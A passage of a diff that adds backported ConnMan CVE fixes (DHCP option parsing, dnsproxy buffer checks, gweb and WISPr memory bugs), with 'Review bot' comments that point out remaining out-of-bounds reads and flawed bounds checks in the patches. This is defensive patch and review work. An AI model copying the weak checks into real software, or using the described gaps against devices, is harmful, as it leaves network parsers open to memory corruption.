+ dhcp_client->status_code = status;
+ }
+ } else {
+- message_type = dhcp_get_option(&packet, DHCP_MESSAGE_TYPE);
++ message_type = dhcp_get_option(&packet, pkt_len, DHCP_MESSAGE_TYPE);
+ if (!message_type)
+ return TRUE;
+ }
+@@ -2378,7 +2380,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->timeout = 0;
+ dhcp_client->retry_times = 0;
+
+- option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++ option = dhcp_get_option(&packet, pkt_len, DHCP_SERVER_ID);
+ dhcp_client->server_ip = get_be32(option);
+ dhcp_client->requested_ip = ntohl(packet.yiaddr);
+
+@@ -2428,9 +2430,9 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+
+ remove_timeouts(dhcp_client);
+
+- dhcp_client->lease_seconds = get_lease(&packet);
++ dhcp_client->lease_seconds = get_lease(&packet, pkt_len);
+
+- get_request(dhcp_client, &packet);
++ get_request(dhcp_client, &packet, pkt_len);
+
+ switch_listening_mode(dhcp_client, L_NONE);
+
+@@ -2438,7 +2440,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->assigned_ip = get_ip(packet.yiaddr);
+
+ if (dhcp_client->state == REBOOTING) {
+- option = dhcp_get_option(&packet,
++ option = dhcp_get_option(&packet, pkt_len,
+ DHCP_SERVER_ID);
+ dhcp_client->server_ip = get_be32(option);
+ }
+diff --git a/gdhcp/common.c b/gdhcp/common.c
+index 1d667d17..c8916aa8 100644
+--- a/gdhcp/common.c
++++ b/gdhcp/common.c
+@@ -73,18 +73,21 @@ GDHCPOptionType dhcp_get_code_type(uint8_t code)
+ return OPTION_UNKNOWN;
+ }
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code)
+ {
+ int len, rem;
+- uint8_t *optionptr;
++ uint8_t *optionptr, *options_end;
++ size_t options_len;
+ uint8_t overload = 0;
+
+ /* option bytes: [code][len][data1][data2]..[dataLEN] */
+ optionptr = packet->options;
+ rem = sizeof(packet->options);
++ options_len = packet_len - (sizeof(*packet) - sizeof(packet->options));
++ options_end = optionptr + options_len - 1;
+
+ while (1) {
+- if (rem <= 0)
++ if ((rem <= 0) && (optionptr + OPT_CODE > options_end))
+ /* Bad packet, malformed option field */
+ return NULL;
+
+@@ -115,14 +118,25 @@ uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
+ break;
+ }
+
++ if (optionptr + OPT_LEN > options_end) {
++ /* bad packet, would read length field from OOB */
++ return NULL;
++ }
++
+ len = 2 + optionptr[OPT_LEN];
+
+ rem -= len;
+ if (rem < 0)
+ continue; /* complain and return NULL */
+
+- if (optionptr[OPT_CODE] == code)
+- return optionptr + OPT_DATA;
++ if (optionptr[OPT_CODE] == code) {
++ if (optionptr + len > options_end) {
++ /* bad packet, option length points OOB */
++ return NULL;
++ } else {
++ return optionptr + OPT_DATA;
++ }
++ }
+
+ if (optionptr[OPT_CODE] == DHCP_OPTION_OVERLOAD)
+ overload |= optionptr[OPT_DATA];
+diff --git a/gdhcp/common.h b/gdhcp/common.h
+index 9660231c..8f63fd75 100644
+--- a/gdhcp/common.h
++++ b/gdhcp/common.h
+@@ -179,7 +179,7 @@ struct in6_pktinfo {
+ };
+ #endif
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code);
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code);
+ uint8_t *dhcpv6_get_option(struct dhcpv6_packet *packet, uint16_t pkt_len,
+ int code, uint16_t *option_len, int *option_count);
+ uint8_t *dhcpv6_get_sub_option(unsigned char *option, uint16_t max_len,
+diff --git a/gdhcp/server.c b/gdhcp/server.c
+index 85405f19..52ea2a55 100644
+--- a/gdhcp/server.c
++++ b/gdhcp/server.c
+@@ -413,7 +413,7 @@ error:
+ }
+
+
+-static uint8_t check_packet_type(struct dhcp_packet *packet)
++static uint8_t check_packet_type(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+ uint8_t *type;
+
+@@ -423,7 +423,7 @@ static uint8_t check_packet_type(struct dhcp_packet *packet)
+ if (packet->op != BOOTREQUEST)
+ return 0;
+
+- type = dhcp_get_option(packet, DHCP_MESSAGE_TYPE);
++ type = dhcp_get_option(packet, packet_len, DHCP_MESSAGE_TYPE);
+
+ if (!type)
+ return 0;
+@@ -651,6 +651,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ struct dhcp_lease *lease;
+ uint32_t requested_nip = 0;
+ uint8_t type, *server_id_option, *request_ip_option;
++ uint16_t packet_len;
+ int re;
+
+ if (condition & (G_IO_NVAL | G_IO_ERR | G_IO_HUP)) {
+@@ -661,12 +662,13 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ re = dhcp_recv_l3_packet(&packet, dhcp_server->listener_sockfd);
+ if (re < 0)
+ return TRUE;
++ packet_len = (uint16_t)(unsigned int)re;
+
+- type = check_packet_type(&packet);
++ type = check_packet_type(&packet, packet_len);
+ if (type == 0)
+ return TRUE;
+
+- server_id_option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++ server_id_option = dhcp_get_option(&packet, packet_len, DHCP_SERVER_ID);
+ if (server_id_option) {
+ uint32_t server_nid =
+ get_unaligned((const uint32_t *) server_id_option);
+@@ -675,7 +677,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ return TRUE;
+ }
+
+- request_ip_option = dhcp_get_option(&packet, DHCP_REQUESTED_IP);
++ request_ip_option = dhcp_get_option(&packet, packet_len, DHCP_REQUESTED_IP);
+ if (request_ip_option)
+ requested_nip = get_be32(request_ip_option);
+
+--
+2.17.1
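Review bot: In dhcp_get_option the loop guard became `(rem <= 0) && (optionptr + OPT_CODE > options_end)`, so it fires only when both conditions hold; for a packet shorter than the full struct `rem` is still positive and the loop goes on to read `optionptr[OPT_CODE]` beyond the received bytes. Either condition alone indicates a malformed option field, so `if (rem <= 0 || optionptr + OPT_CODE > options_end)` looks like the intended test. `options_len` is also computed by unsigned subtraction and wraps when `packet_len` is smaller than the fixed header, and in gdhcp/client.c `re` is cast into `pkt_len` before any `re < 0` check visible in the hunk. The code mirrors the cited upstream commit, so any deviation should be raised upstream as well.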
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
new file mode 100644
index 0000000000..ce909ec293
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
@@ -0,0 +1,33 @@
+From a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1 Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:09 +0100
+Subject: [PATCH] gdhcp: Avoid leaking stack data via unitiialized variable
+
+Fixes: CVE-2021-26676
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 6a5613e7..c7b85e58 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -2270,7 +2270,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ {
+ GDHCPClient *dhcp_client = user_data;
+ struct sockaddr_in dst_addr = { 0 };
+- struct dhcp_packet packet;
++ struct dhcp_packet packet = { 0 };
+ struct dhcpv6_packet *packet6 = NULL;
+ uint8_t *message_type = NULL, *client_id = NULL, *option,
+ *server_id = NULL;
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
new file mode 100644
index 0000000000..770948fb69
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
@@ -0,0 +1,72 @@
+From eceb2e8d2341c041df55a5e2f047d9a8c491463c Mon Sep 17 00:00:00 2001
+From: Valery Kashcheev <v.kascheev@omp.ru>
+Date: Mon, 7 Jun 2021 18:58:24 +0200
+Subject: dnsproxy: Check the length of buffers before memcpy
+
+Fix using a stack-based buffer overflow attack by checking the length of
+the ptr and uptr buffers.
+
+Fix debug message output.
+
+Fixes: CVE-2021-33833
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=eceb2e8d2341c041df55a5e2f047d9a8c491463c
+CVE: CVE-2021-33833
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index de52df5a..38dbdd71 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1788,17 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * tmp buffer.
+ */
+
+- debug("pos %d ulen %d left %d name %s", pos, ulen,
+- (int)(uncomp_len - (uptr - uncompressed)), uptr);
+-
+- ulen = strlen(name);
+- if ((uptr + ulen + 1) > uncomp_end) {
++ ulen = strlen(name) + 1;
++ if ((uptr + ulen) > uncomp_end)
+ goto out;
+- }
+- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++ strncpy(uptr, name, ulen);
++
++ debug("pos %d ulen %d left %d name %s", pos, ulen,
++ (int)(uncomp_end - (uptr + ulen)), uptr);
+
+ uptr += ulen;
+- *uptr++ = '\0';
+
+ ptr += pos;
+
+@@ -1841,7 +1839,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ } else if (dns_type == ns_t_a || dns_type == ns_t_aaaa) {
+ dlen = uptr[-2] << 8 | uptr[-1];
+
+- if (ptr + dlen > end) {
++ if ((ptr + dlen) > end || (uptr + dlen) > uncomp_end) {
+ debug("data len %d too long", dlen);
+ goto out;
+ }
+@@ -1880,6 +1878,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * refresh interval, retry interval, expiration
+ * limit and minimum ttl). They are 20 bytes long.
+ */
++ if ((uptr + 20) > uncomp_end || (ptr + 20) > end) {
++ debug("soa record too long");
++ goto out;
++ }
+ memcpy(uptr, ptr, 20);
+ uptr += 20;
+ ptr += 20;
+--
+cgit 1.2.3-1.el7
+
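Review bot: The three bounds checks added to uncompress() compare a computed pointer against the buffer end (`(uptr + ulen) > uncomp_end`, `(uptr + dlen) > uncomp_end`, `(uptr + 20) > uncomp_end`), so the out-of-range pointer is formed before it is rejected. `dlen` is assembled from two bytes of the message, and adding a value of that size to a pointer into a fixed-size buffer is undefined behaviour, which leaves the check itself unreliable. Comparing lengths keeps the arithmetic inside the buffer, for example `if (dlen > end - ptr || dlen > uncomp_end - uptr)` and `if (ulen > uncomp_end - uptr)`. The declarations of `dlen`, `ulen` and `uncomp_end` are outside the hunks, so the operand types need checking when the comparisons are rewritten.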
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
new file mode 100644
index 0000000000..7f27474830
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
@@ -0,0 +1,121 @@
+From e5a313736e13c90d19085e953a26256a198e4950 Mon Sep 17 00:00:00 2001
+From: Daniel Wagner <wagi@monom.org>
+Date: Tue, 25 Jan 2022 10:00:24 +0100
+Subject: dnsproxy: Validate input data before using them
+
+dnsproxy is not validating various input data. Add a bunch of checks.
+
+Fixes: CVE-2022-23097
+Fixes: CVE-2022-23096
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e5a313736e13c90d19085e953a26256a198e4950
+
+CVE: CVE-2022-23096 CVE-2022-23097
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 31 ++++++++++++++++++++++++++-----
+ 1 file changed, 26 insertions(+), 5 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index cdfafbc2..c027bcb9 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1951,6 +1951,12 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+
+ if (offset < 0)
+ return offset;
++ if (reply_len < 0)
++ return -EINVAL;
++ if (reply_len < offset + 1)
++ return -EINVAL;
++ if ((size_t)reply_len < sizeof(struct domain_hdr))
++ return -EINVAL;
+
+ hdr = (void *)(reply + offset);
+ dns_id = reply[offset] | reply[offset + 1] << 8;
+@@ -1986,23 +1992,31 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ */
+ if (req->append_domain && ntohs(hdr->qdcount) == 1) {
+ uint16_t domain_len = 0;
+- uint16_t header_len;
++ uint16_t header_len, payload_len;
+ uint16_t dns_type, dns_class;
+ uint8_t host_len, dns_type_pos;
+ char uncompressed[NS_MAXDNAME], *uptr;
+ char *ptr, *eom = (char *)reply + reply_len;
++ char *domain;
+
+ /*
+ * ptr points to the first char of the hostname.
+ * ->hostname.domain.net
+ */
+ header_len = offset + sizeof(struct domain_hdr);
++ if (reply_len < header_len)
++ return -EINVAL;
++ payload_len = reply_len - header_len;
++
+ ptr = (char *)reply + header_len;
+
+ host_len = *ptr;
++ domain = ptr + 1 + host_len;
++ if (domain > eom)
++ return -EINVAL;
++
+ if (host_len > 0)
+- domain_len = strnlen(ptr + 1 + host_len,
+- reply_len - header_len);
++ domain_len = strnlen(domain, eom - domain);
+
+ /*
+ * If the query type is anything other than A or AAAA,
+@@ -2011,6 +2025,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ */
+ dns_type_pos = host_len + 1 + domain_len + 1;
+
++ if (ptr + (dns_type_pos + 3) > eom)
++ return -EINVAL;
+ dns_type = ptr[dns_type_pos] << 8 |
+ ptr[dns_type_pos + 1];
+ dns_class = ptr[dns_type_pos + 2] << 8 |
+@@ -2040,6 +2056,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ int new_len, fixed_len;
+ char *answers;
+
++ if (len > payload_len)
++ return -EINVAL;
+ /*
+ * First copy host (without domain name) into
+ * tmp buffer.
+@@ -2054,6 +2072,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ * Copy type and class fields of the question.
+ */
+ ptr += len + domain_len + 1;
++ if (ptr + NS_QFIXEDSZ > eom)
++ return -EINVAL;
+ memcpy(uptr, ptr, NS_QFIXEDSZ);
+
+ /*
+@@ -2063,6 +2083,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ uptr += NS_QFIXEDSZ;
+ answers = uptr;
+ fixed_len = answers - uncompressed;
++ if (ptr + offset > eom)
++ return -EINVAL;
+
+ /*
+ * We then uncompress the result to buffer
+@@ -2257,8 +2279,7 @@ static gboolean udp_server_event(GIOChannel *channel, GIOCondition condition,
+
+ len = recv(sk, buf, sizeof(buf), 0);
+
+- if (len >= 12)
+- forward_dns_reply(buf, len, IPPROTO_UDP, data);
++ forward_dns_reply(buf, len, IPPROTO_UDP, data);
+
+ return TRUE;
+ }
+--
+cgit 1.2.3-1.el7
+
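Review bot: The new header checks in forward_dns_reply() do not cover every byte that is read afterwards. The early test `(size_t)reply_len < sizeof(struct domain_hdr)` ignores `offset` although `hdr` is set to `reply + offset`, so for a non-zero offset fields such as `hdr->qdcount` can lie beyond `reply_len`; `if (reply_len < offset + (int)sizeof(struct domain_hdr)) return -EINVAL;` would cover both that and the `reply[offset + 1]` read. Inside the append_domain branch, `if (reply_len < header_len)` lets `reply_len == header_len` through, and `host_len = *ptr` then reads the byte at `eom`; using `<=` closes that. Where `offset` comes from is not visible in these hunks, so the first case matters only if it can be positive.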
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
new file mode 100644
index 0000000000..a40c9f583f
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
@@ -0,0 +1,50 @@
+From d8708b85c1e8fe25af7803e8a20cf20e7201d8a4 Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <mgerstner@suse.de>
+Date: Tue, 25 Jan 2022 10:00:25 +0100
+Subject: dnsproxy: Avoid 100 % busy loop in TCP server case
+
+Once the TCP socket is connected and until the remote server is
+responding (if ever) ConnMan executes a 100 % CPU loop, since
+the connected socket will always be writable (G_IO_OUT).
+
+To fix this, modify the watch after the connection is established to
+remove the G_IO_OUT from the callback conditions.
+
+Fixes: CVE-2022-23098
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d8708b85c1e8fe25af7803e8a20cf20e7201d8a4
+
+CVE: CVE-2022-23098
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index c027bcb9..1ccf36a9 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -2360,6 +2360,18 @@ hangup:
+ }
+ }
+
++ /*
++ * Remove the G_IO_OUT flag from the watch, otherwise we end
++ * up in a busy loop, because the socket is constantly writable.
++ *
++ * There seems to be no better way in g_io to do that than
++ * re-adding the watch.
++ */
++ g_source_remove(server->watch);
++ server->watch = g_io_add_watch(server->channel,
++ G_IO_IN | G_IO_HUP | G_IO_NVAL | G_IO_ERR,
++ tcp_server_event, server);
++
+ server->connected = true;
+ server_list = g_slist_append(server_list, server);
+
+--
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
new file mode 100644
index 0000000000..74a739d6a2
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
@@ -0,0 +1,37 @@
+From d1a5ede5d255bde8ef707f8441b997563b9312bd Mon Sep 17 00:00:00 2001
+From: Nathan Crandall <ncrandall@tesla.com>
+Date: Tue, 12 Jul 2022 08:56:34 +0200
+Subject: gweb: Fix OOB write in received_data()
+
+There is a mismatch of handling binary vs. C-string data with memchr
+and strlen, resulting in pos, count, and bytes_read to become out of
+sync and result in a heap overflow. Instead, do not treat the buffer
+as an ASCII C-string. We calculate the count based on the return value
+of memchr, instead of strlen.
+
+Fixes: CVE-2022-32292
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d1a5ede5d255bde8ef707f8441b997563b9312b
+CVE: CVE-2022-32292
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+---
+ gweb/gweb.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gweb/gweb.c b/gweb/gweb.c
+index 12fcb1d8..13c6c5f2 100644
+--- a/gweb/gweb.c
++++ b/gweb/gweb.c
+@@ -918,7 +918,7 @@ static gboolean received_data(GIOChannel *channel, GIOCondition cond,
+ }
+
+ *pos = '\0';
+- count = strlen((char *) ptr);
++ count = pos - ptr;
+ if (count > 0 && ptr[count - 1] == '\r') {
+ ptr[--count] = '\0';
+ bytes_read--;
+--
+cgit
+
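Review bot: The commit id in the Upstream-Status reference is one character short: the URL ends in `...997563b9312b`, while the `From` line of the same patch gives `d1a5ede5d255bde8ef707f8441b997563b9312bd`. Writing the full id keeps the backport traceable to the exact upstream commit: `https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d1a5ede5d255bde8ef707f8441b997563b9312bd`. Other patches in this series put the reference in brackets after `Upstream-Status: Backport`, which would be the consistent form here too.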
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
new file mode 100644
index 0000000000..83a013981c
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
@@ -0,0 +1,266 @@
+From 358a44b1442fae0f82846e10da0708b5c4e1ce27 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 20 Sep 2022 17:58:19 +0530
+Subject: [PATCH] CVE-2022-32293
+
+CVE: CVE-2022-32293
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=72343929836de80727a27d6744c869dff045757c && https://git.kernel.org/pub/scm/network/connman/connman.git/commit/src/wispr.c?id=416bfaff988882c553c672e5bfc2d4f648d29e8a]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/wispr.c | 83 ++++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 63 insertions(+), 20 deletions(-)
+
+diff --git a/src/wispr.c b/src/wispr.c
+index 473c0e0..97e0242 100644
+--- a/src/wispr.c
++++ b/src/wispr.c
+@@ -59,6 +59,7 @@ struct wispr_route {
+ };
+
+ struct connman_wispr_portal_context {
++ int refcount;
+ struct connman_service *service;
+ enum connman_ipconfig_type type;
+ struct connman_wispr_portal *wispr_portal;
+@@ -96,10 +97,13 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data);
+
+ static GHashTable *wispr_portal_list = NULL;
+
++#define wispr_portal_context_ref(wp_context) \
++ wispr_portal_context_ref_debug(wp_context, __FILE__, __LINE__, __func__)
++#define wispr_portal_context_unref(wp_context) \
++ wispr_portal_context_unref_debug(wp_context, __FILE__, __LINE__, __func__)
++
+ static void connman_wispr_message_init(struct connman_wispr_message *msg)
+ {
+- DBG("");
+-
+ msg->has_error = false;
+ msg->current_element = NULL;
+
+@@ -159,11 +163,6 @@ static void free_wispr_routes(struct connman_wispr_portal_context *wp_context)
+ static void free_connman_wispr_portal_context(
+ struct connman_wispr_portal_context *wp_context)
+ {
+- DBG("context %p", wp_context);
+-
+- if (!wp_context)
+- return;
+-
+ if (wp_context->wispr_portal) {
+ if (wp_context->wispr_portal->ipv4_context == wp_context)
+ wp_context->wispr_portal->ipv4_context = NULL;
+@@ -200,9 +199,38 @@ static void free_connman_wispr_portal_context(
+ g_free(wp_context);
+ }
+
++static struct connman_wispr_portal_context *
++wispr_portal_context_ref_debug(struct connman_wispr_portal_context *wp_context,
++ const char *file, int line, const char *caller)
++{
++ DBG("%p ref %d by %s:%d:%s()", wp_context,
++ wp_context->refcount + 1, file, line, caller);
++
++ __sync_fetch_and_add(&wp_context->refcount, 1);
++
++ return wp_context;
++}
++
++static void wispr_portal_context_unref_debug(
++ struct connman_wispr_portal_context *wp_context,
++ const char *file, int line, const char *caller)
++{
++ if (!wp_context)
++ return;
++
++ DBG("%p ref %d by %s:%d:%s()", wp_context,
++ wp_context->refcount - 1, file, line, caller);
++
++ if (__sync_fetch_and_sub(&wp_context->refcount, 1) != 1)
++ return;
++
++ free_connman_wispr_portal_context(wp_context);
++}
++
+ static struct connman_wispr_portal_context *create_wispr_portal_context(void)
+ {
+- return g_try_new0(struct connman_wispr_portal_context, 1);
++ return wispr_portal_context_ref(
++ g_new0(struct connman_wispr_portal_context, 1));
+ }
+
+ static void free_connman_wispr_portal(gpointer data)
+@@ -214,8 +242,8 @@ static void free_connman_wispr_portal(gpointer data)
+ if (!wispr_portal)
+ return;
+
+- free_connman_wispr_portal_context(wispr_portal->ipv4_context);
+- free_connman_wispr_portal_context(wispr_portal->ipv6_context);
++ wispr_portal_context_unref(wispr_portal->ipv4_context);
++ wispr_portal_context_unref(wispr_portal->ipv6_context);
+
+ g_free(wispr_portal);
+ }
+@@ -450,8 +478,6 @@ static void portal_manage_status(GWebResult *result,
+ &str))
+ connman_info("Client-Timezone: %s", str);
+
+- free_connman_wispr_portal_context(wp_context);
+-
+ __connman_service_ipconfig_indicate_state(service,
+ CONNMAN_SERVICE_STATE_ONLINE, type);
+ }
+@@ -509,14 +535,17 @@ static void wispr_portal_request_portal(
+ {
+ DBG("");
+
++ wispr_portal_context_ref(wp_context);
+ wp_context->request_id = g_web_request_get(wp_context->web,
+ wp_context->status_url,
+ wispr_portal_web_result,
+ wispr_route_request,
+ wp_context);
+
+- if (wp_context->request_id == 0)
++ if (wp_context->request_id == 0) {
+ wispr_portal_error(wp_context);
++ wispr_portal_context_unref(wp_context);
++ }
+ }
+
+ static bool wispr_input(const guint8 **data, gsize *length,
+@@ -562,13 +591,15 @@ static void wispr_portal_browser_reply_cb(struct connman_service *service,
+ return;
+
+ if (!authentication_done) {
+- wispr_portal_error(wp_context);
+ free_wispr_routes(wp_context);
++ wispr_portal_error(wp_context);
++ wispr_portal_context_unref(wp_context);
+ return;
+ }
+
+ /* Restarting the test */
+ __connman_service_wispr_start(service, wp_context->type);
++ wispr_portal_context_unref(wp_context);
+ }
+
+ static void wispr_portal_request_wispr_login(struct connman_service *service,
+@@ -592,7 +623,7 @@ static void wispr_portal_request_wispr_login(struct connman_service *service,
+ return;
+ }
+
+- free_connman_wispr_portal_context(wp_context);
++ wispr_portal_context_unref(wp_context);
+ return;
+ }
+
+@@ -644,11 +675,13 @@ static bool wispr_manage_message(GWebResult *result,
+
+ wp_context->wispr_result = CONNMAN_WISPR_RESULT_LOGIN;
+
++ wispr_portal_context_ref(wp_context);
+ if (__connman_agent_request_login_input(wp_context->service,
+ wispr_portal_request_wispr_login,
+- wp_context) != -EINPROGRESS)
++ wp_context) != -EINPROGRESS) {
+ wispr_portal_error(wp_context);
+- else
++ wispr_portal_context_unref(wp_context);
++ } else
+ return true;
+
+ break;
+@@ -697,6 +730,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ if (length > 0) {
+ g_web_parser_feed_data(wp_context->wispr_parser,
+ chunk, length);
++ wispr_portal_context_unref(wp_context);
+ return true;
+ }
+
+@@ -714,6 +748,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+
+ switch (status) {
+ case 000:
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->status_url, wp_context);
+@@ -725,11 +760,14 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ if (g_web_result_get_header(result, "X-ConnMan-Status",
+ &str)) {
+ portal_manage_status(result, wp_context);
++ wispr_portal_context_unref(wp_context);
+ return false;
+- } else
++ } else {
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->redirect_url, wp_context);
++ }
+
+ break;
+ case 302:
+@@ -737,6 +775,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ !g_web_result_get_header(result, "Location",
+ &redirect)) {
+
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->status_url, wp_context);
+@@ -747,6 +786,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+
+ wp_context->redirect_url = g_strdup(redirect);
+
++ wispr_portal_context_ref(wp_context);
+ wp_context->request_id = g_web_request_get(wp_context->web,
+ redirect, wispr_portal_web_result,
+ wispr_route_request, wp_context);
+@@ -763,6 +803,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+
+ break;
+ case 505:
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->status_url, wp_context);
+@@ -775,6 +816,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ wp_context->request_id = 0;
+ done:
+ wp_context->wispr_msg.message_type = -1;
++ wispr_portal_context_unref(wp_context);
+ return false;
+ }
+
+@@ -809,6 +851,7 @@ static void proxy_callback(const char *proxy, void *user_data)
+ xml_wispr_parser_callback, wp_context);
+
+ wispr_portal_request_portal(wp_context);
++ wispr_portal_context_unref(wp_context);
+ }
+
+ static gboolean no_proxy_callback(gpointer user_data)
+@@ -903,7 +946,7 @@ static int wispr_portal_detect(struct connman_wispr_portal_context *wp_context)
+
+ if (wp_context->token == 0) {
+ err = -EINVAL;
+- free_connman_wispr_portal_context(wp_context);
++ wispr_portal_context_unref(wp_context);
+ }
+ } else if (wp_context->timeout == 0) {
+ wp_context->timeout = g_idle_add(no_proxy_callback, wp_context);
+@@ -952,7 +995,7 @@ int __connman_wispr_start(struct connman_service *service,
+
+ /* If there is already an existing context, we wipe it */
+ if (wp_context)
+- free_connman_wispr_portal_context(wp_context);
++ wispr_portal_context_unref(wp_context);
+
+ wp_context = create_wispr_portal_context();
+ if (!wp_context)
+--
+2.25.1
+
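Review bot: In wispr_portal_web_result() the `length > 0` branch now calls `wispr_portal_context_unref(wp_context)` and then returns true. The reference it drops appears to be the one taken before `g_web_request_get()` in wispr_portal_request_portal(). If gweb invokes the result function again for further chunks of the same request (gweb's side is not part of this patch), each call drops another reference and the context can be freed while the request still holds the pointer. In that case the branch should keep the reference, i.e. stay as `g_web_parser_feed_data(...); return true;`, and release only on the paths that return false. Separately, the `__connman_agent_request_browser()` call sites take a reference without checking the return value, so a request that fails to start would leave it held.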
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
new file mode 100644
index 0000000000..ea1601cc04
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
@@ -0,0 +1,54 @@
+From 99e2c16ea1cced34a5dc450d76287a1c3e762138 Mon Sep 17 00:00:00 2001
+From: Daniel Wagner <wagi@monom.org>
